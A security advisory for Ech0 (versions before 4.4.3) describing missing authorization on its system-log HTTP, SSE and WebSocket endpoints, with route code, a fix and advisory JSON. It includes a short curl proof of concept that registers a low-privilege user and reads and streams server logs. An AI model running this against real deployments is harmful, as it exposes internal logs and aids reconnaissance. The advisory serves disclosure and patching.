GHSA-W8JJ-CWMC-WGQ2
Vulnerability from github – Published: 2026-04-10 19:49 – Updated: 2026-04-10 19:49
VLAI
Summary
Ech0's Missing Authorization on System Logs Allows Non-Admin Information Disclosure
Details
Summary
The system log endpoints (GET /api/system/logs, GET /api/system/logs/stream, WS /ws/system/logs) lack authorization checks, allowing any authenticated non-admin user to read and stream all server logs. These logs contain error stack traces, internal file paths, module names, and arbitrary structured fields that facilitate reconnaissance for further attacks.
Details
The dashboard routes in internal/router/dashboard.go:7-8 register log endpoints on the AuthRouterGroup without any RequireScopes middleware:
// internal/router/dashboard.go
func setupDashboardRoutes(appRouterGroup *AppRouterGroup, h *handler.Bundle) {
appRouterGroup.AuthRouterGroup.GET("/system/logs", h.DashboardHandler.GetSystemLogs())
appRouterGroup.AuthRouterGroup.GET("/system/logs/stream", h.DashboardHandler.SSESubscribeSystemLogs())
appRouterGroup.WSRouterGroup.GET("/system/logs", h.DashboardHandler.WSSubscribeSystemLogs())
}
Compare with other admin-only routes that properly use RequireScopes:
// internal/router/setting.go — every route has RequireScopes
appRouterGroup.AuthRouterGroup.GET("/settings",
middleware.RequireScopes(authModel.ScopeAdminSettings),
h.SettingHandler.GetSiteSettings())
The AuthRouterGroup only applies JWTAuthMiddleware() (router.go:36), which validates the JWT and sets the viewer context but does not check admin status. The WSRouterGroup (router.go:37) has no middleware at all — the WebSocket handler only calls ParseToken to verify the JWT signature (dashboard.go:74) without any role/scope validation.
The handler (internal/handler/dashboard/dashboard.go:29-62) and service (internal/service/dashboard/dashboard.go:21-27) contain zero authorization checks. Other services in the codebase properly enforce admin access:
- internal/service/inbox/inbox.go:132 — ensureAdmin()
- internal/service/migrator/migrator.go:360 — ensureAdmin()
- internal/service/comment/comment.go:719 — requireAdmin()
Non-admin users are created with IsAdmin: false and IsOwner: false (internal/service/user/user.go:220-221) via the public registration endpoint.
The LogEntry struct (internal/util/log/log.go:78-87) exposes:
type LogEntry struct {
Time string `json:"time"`
Level string `json:"level"`
Msg string `json:"msg"`
Module string `json:"module,omitempty"`
Caller string `json:"caller,omitempty"` // internal file paths
Error string `json:"error,omitempty"` // error stack traces
Fields map[string]any `json:"fields,omitempty"` // arbitrary structured data
Raw string `json:"raw,omitempty"` // raw log lines
}
PoC
# 1. Register a non-admin user (system allows up to 5 users by default)
curl -X POST http://localhost:8080/api/register \
-H 'Content-Type: application/json' \
-d '{"username":"attacker","password":"Password123"}'
# 2. Login to get session token
TOKEN=$(curl -s -X POST http://localhost:8080/api/login \
-H 'Content-Type: application/json' \
-d '{"username":"attacker","password":"Password123"}' | jq -r '.data.token')
# 3. Read system logs — should require admin but doesn't
curl http://localhost:8080/api/system/logs \
-H "Authorization: Bearer $TOKEN"
# Returns: {"code":1,"data":[{"time":"...","level":"error","msg":"...","module":"...","caller":"internal/service/user/user.go:145","error":"...","fields":{...}},...]}
# 4. Subscribe to real-time log stream via SSE
curl -N "http://localhost:8080/api/system/logs/stream?token=$TOKEN"
# 5. Subscribe via WebSocket (WSRouterGroup has NO middleware)
# wscat -c "ws://localhost:8080/ws/system/logs?token=$TOKEN"
Impact
Any registered non-admin user can: - Read all historical system logs including error traces that reveal internal code paths, database errors, and application state - Stream real-time logs via SSE or WebSocket to monitor all server activity as it happens - Gather reconnaissance data — caller fields expose internal file paths and line numbers, error fields expose stack traces and database query failures, module fields map the internal architecture - Monitor other users' actions — authentication failures, registration events, and admin operations appear in logs
This information disclosure lowers the bar for chaining further attacks by revealing the application's internal structure, error handling patterns, and operational state.
Recommended Fix
Add RequireScopes middleware with an admin scope to the dashboard routes:
// internal/router/dashboard.go
func setupDashboardRoutes(appRouterGroup *AppRouterGroup, h *handler.Bundle) {
appRouterGroup.AuthRouterGroup.GET("/system/logs",
middleware.RequireScopes(authModel.ScopeAdminSettings),
h.DashboardHandler.GetSystemLogs())
appRouterGroup.AuthRouterGroup.GET("/system/logs/stream",
middleware.RequireScopes(authModel.ScopeAdminSettings),
h.DashboardHandler.SSESubscribeSystemLogs())
appRouterGroup.WSRouterGroup.GET("/system/logs",
middleware.RequireScopes(authModel.ScopeAdminSettings),
h.DashboardHandler.WSSubscribeSystemLogs())
}
Additionally, the WebSocket handler should validate admin scope after parsing the token, since the WSRouterGroup lacks middleware:
// internal/handler/dashboard/dashboard.go — WSSubscribeSystemLogs
claims, err := jwtUtil.ParseToken(token)
if err != nil {
ctx.AbortWithStatusJSON(http.StatusUnauthorized, gin.H{"msg": "invalid token"})
return
}
// Add admin check for WebSocket endpoint
if claims.TokenType == authModel.TokenTypeAccess && !containsScope(claims.Scopes, authModel.ScopeAdminSettings) {
ctx.AbortWithStatusJSON(http.StatusForbidden, gin.H{"msg": "admin access required"})
return
}
Severity
4.3 (Medium)
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/lin-snow/ech0"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.4.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-10T19:49:33Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "## Summary\n\nThe system log endpoints (`GET /api/system/logs`, `GET /api/system/logs/stream`, `WS /ws/system/logs`) lack authorization checks, allowing any authenticated non-admin user to read and stream all server logs. These logs contain error stack traces, internal file paths, module names, and arbitrary structured fields that facilitate reconnaissance for further attacks.\n\n## Details\n\nThe dashboard routes in `internal/router/dashboard.go:7-8` register log endpoints on the `AuthRouterGroup` without any `RequireScopes` middleware:\n\n```go\n// internal/router/dashboard.go\nfunc setupDashboardRoutes(appRouterGroup *AppRouterGroup, h *handler.Bundle) {\n\tappRouterGroup.AuthRouterGroup.GET(\"/system/logs\", h.DashboardHandler.GetSystemLogs())\n\tappRouterGroup.AuthRouterGroup.GET(\"/system/logs/stream\", h.DashboardHandler.SSESubscribeSystemLogs())\n\tappRouterGroup.WSRouterGroup.GET(\"/system/logs\", h.DashboardHandler.WSSubscribeSystemLogs())\n}\n```\n\nCompare with other admin-only routes that properly use `RequireScopes`:\n\n```go\n// internal/router/setting.go \u2014 every route has RequireScopes\nappRouterGroup.AuthRouterGroup.GET(\"/settings\",\n middleware.RequireScopes(authModel.ScopeAdminSettings),\n h.SettingHandler.GetSiteSettings())\n```\n\nThe `AuthRouterGroup` only applies `JWTAuthMiddleware()` (router.go:36), which validates the JWT and sets the viewer context but does **not** check admin status. The `WSRouterGroup` (router.go:37) has no middleware at all \u2014 the WebSocket handler only calls `ParseToken` to verify the JWT signature (dashboard.go:74) without any role/scope validation.\n\nThe handler (`internal/handler/dashboard/dashboard.go:29-62`) and service (`internal/service/dashboard/dashboard.go:21-27`) contain zero authorization checks. Other services in the codebase properly enforce admin access:\n- `internal/service/inbox/inbox.go:132` \u2014 `ensureAdmin()`\n- `internal/service/migrator/migrator.go:360` \u2014 `ensureAdmin()`\n- `internal/service/comment/comment.go:719` \u2014 `requireAdmin()`\n\nNon-admin users are created with `IsAdmin: false` and `IsOwner: false` (`internal/service/user/user.go:220-221`) via the public registration endpoint.\n\nThe `LogEntry` struct (`internal/util/log/log.go:78-87`) exposes:\n```go\ntype LogEntry struct {\n Time string `json:\"time\"`\n Level string `json:\"level\"`\n Msg string `json:\"msg\"`\n Module string `json:\"module,omitempty\"`\n Caller string `json:\"caller,omitempty\"` // internal file paths\n Error string `json:\"error,omitempty\"` // error stack traces\n Fields map[string]any `json:\"fields,omitempty\"` // arbitrary structured data\n Raw string `json:\"raw,omitempty\"` // raw log lines\n}\n```\n\n## PoC\n\n```bash\n# 1. Register a non-admin user (system allows up to 5 users by default)\ncurl -X POST http://localhost:8080/api/register \\\n -H \u0027Content-Type: application/json\u0027 \\\n -d \u0027{\"username\":\"attacker\",\"password\":\"Password123\"}\u0027\n\n# 2. Login to get session token\nTOKEN=$(curl -s -X POST http://localhost:8080/api/login \\\n -H \u0027Content-Type: application/json\u0027 \\\n -d \u0027{\"username\":\"attacker\",\"password\":\"Password123\"}\u0027 | jq -r \u0027.data.token\u0027)\n\n# 3. Read system logs \u2014 should require admin but doesn\u0027t\ncurl http://localhost:8080/api/system/logs \\\n -H \"Authorization: Bearer $TOKEN\"\n# Returns: {\"code\":1,\"data\":[{\"time\":\"...\",\"level\":\"error\",\"msg\":\"...\",\"module\":\"...\",\"caller\":\"internal/service/user/user.go:145\",\"error\":\"...\",\"fields\":{...}},...]}\n\n# 4. Subscribe to real-time log stream via SSE\ncurl -N \"http://localhost:8080/api/system/logs/stream?token=$TOKEN\"\n\n# 5. Subscribe via WebSocket (WSRouterGroup has NO middleware)\n# wscat -c \"ws://localhost:8080/ws/system/logs?token=$TOKEN\"\n```\n\n## Impact\n\nAny registered non-admin user can:\n- **Read all historical system logs** including error traces that reveal internal code paths, database errors, and application state\n- **Stream real-time logs** via SSE or WebSocket to monitor all server activity as it happens\n- **Gather reconnaissance data** \u2014 caller fields expose internal file paths and line numbers, error fields expose stack traces and database query failures, module fields map the internal architecture\n- **Monitor other users\u0027 actions** \u2014 authentication failures, registration events, and admin operations appear in logs\n\nThis information disclosure lowers the bar for chaining further attacks by revealing the application\u0027s internal structure, error handling patterns, and operational state.\n\n## Recommended Fix\n\nAdd `RequireScopes` middleware with an admin scope to the dashboard routes:\n\n```go\n// internal/router/dashboard.go\nfunc setupDashboardRoutes(appRouterGroup *AppRouterGroup, h *handler.Bundle) {\n\tappRouterGroup.AuthRouterGroup.GET(\"/system/logs\",\n\t\tmiddleware.RequireScopes(authModel.ScopeAdminSettings),\n\t\th.DashboardHandler.GetSystemLogs())\n\tappRouterGroup.AuthRouterGroup.GET(\"/system/logs/stream\",\n\t\tmiddleware.RequireScopes(authModel.ScopeAdminSettings),\n\t\th.DashboardHandler.SSESubscribeSystemLogs())\n\tappRouterGroup.WSRouterGroup.GET(\"/system/logs\",\n\t\tmiddleware.RequireScopes(authModel.ScopeAdminSettings),\n\t\th.DashboardHandler.WSSubscribeSystemLogs())\n}\n```\n\nAdditionally, the WebSocket handler should validate admin scope after parsing the token, since the `WSRouterGroup` lacks middleware:\n\n```go\n// internal/handler/dashboard/dashboard.go \u2014 WSSubscribeSystemLogs\nclaims, err := jwtUtil.ParseToken(token)\nif err != nil {\n ctx.AbortWithStatusJSON(http.StatusUnauthorized, gin.H{\"msg\": \"invalid token\"})\n return\n}\n// Add admin check for WebSocket endpoint\nif claims.TokenType == authModel.TokenTypeAccess \u0026\u0026 !containsScope(claims.Scopes, authModel.ScopeAdminSettings) {\n ctx.AbortWithStatusJSON(http.StatusForbidden, gin.H{\"msg\": \"admin access required\"})\n return\n}\n```",
"id": "GHSA-w8jj-cwmc-wgq2",
"modified": "2026-04-10T19:49:33Z",
"published": "2026-04-10T19:49:33Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/lin-snow/Ech0/security/advisories/GHSA-w8jj-cwmc-wgq2"
},
{
"type": "PACKAGE",
"url": "https://github.com/lin-snow/Ech0"
},
{
"type": "WEB",
"url": "https://github.com/lin-snow/Ech0/releases/tag/v4.4.3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Ech0\u0027s Missing Authorization on System Logs Allows Non-Admin Information Disclosure"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…